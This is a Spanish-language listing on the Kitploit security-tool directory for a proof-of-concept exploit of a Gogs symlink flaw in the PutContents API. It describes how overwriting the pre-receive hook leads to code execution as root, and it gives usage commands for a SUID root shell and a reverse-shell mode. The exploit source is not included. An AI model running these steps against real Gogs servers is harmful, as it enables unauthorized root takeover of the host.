Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/bridgeralderson/cve-2025-81110-poc
Escalada de PrivilegiosAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónRed TeamingDesarrollo de Payloads
GitHubbridgeralderson/cve-2025-81110-poc

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-81110-PoC

El manejo incorrecto de enlaces simbólicos en la API PutContents en Gogs permite la Ejecución Local de Código.

Ver Repositorio
41hace 5 mesesAún no revisado

CVE-2025-81110-PoC

El manejo inadecuado de enlaces simbólicos en la API PutContents de Gogs permite la ejecución local de código.

Este repositorio contiene un exploit de nivel profesional para una vulnerabilidad crítica en versiones de Gogs anteriores a la 0.13.0. El exploit aprovecha una falla lógica donde la API de Gogs no valida los tipos de archivo al actualizar el contenido del repositorio. Al inyectar un enlace simbólico que apunta a un hook de Git del lado del servidor (pre-receive), un usuario autenticado puede sobrescribir el contenido del hook con un script malicioso. Las operaciones posteriores de push de Git activan la ejecución de este script en el contexto del usuario que ejecuta el servicio de Gogs (normalmente root).

Inyección de Enlace Simbólico: El atacante sube un enlace simbólico que apunta a hooks internos del repositorio (p. ej., /root/gogs-repositories//.git/hooks/pre-receive).

Sobrescritura vía API: La API de Gogs permite actualizar el contenido del enlace simbólico. Debido a que el sistema operativo sigue el enlace durante la operación de escritura, el hook interno de Git es sobrescrito.

RCE / Escalada de Privilegios: Un push de Git posterior activa el hook pre-receive. Si Gogs está configurado con RUN_USER = root, el atacante obtiene control total del sistema.

Requisitos

  • Python 3.x
  • librería requests
  • herramienta de línea de comandos git instalada en la máquina del atacante

USO

Modo SUID

root@kitploit:~
python3 exploit.py --url http://target:3000 --user <username> --pass <password> --mode suid

Después de la ejecución, obtén acceso root en el objetivo:

root@kitploit:~
/tmp/rootbash -p

REVSHELL

root@kitploit:~
python3 exploit.py --url http://target:3000 --user <username> --pass <password> --mode rev --lhost <your_ip> --lport 4444

Referencia de Argumentos

Descargo de responsabilidad

Esta herramienta es solo para fines educativos y auditorías de seguridad autorizadas. El autor no se responsabiliza por ningún uso indebido o daño causado por esta herramienta en sistemas que posees o sobre los cuales tienes permiso explícito para realizar pruebas.

Descargar herramienta
ArgumentoObligatorioDescripción
--urlSíLa URL base de la instancia de Gogs (p. ej., http://127.0.0.1:3001).
--userSíNombre de usuario válido para la autenticación.
--passSíContraseña válida para el usuario especificado.
--modeNoModo de explotación: suid (crea /tmp/rootbash) o rev (shell inversa).
--lhostNoDirección IP local para la callback del shell inversa.
--lportNoPuerto local para el listener del shell inversa.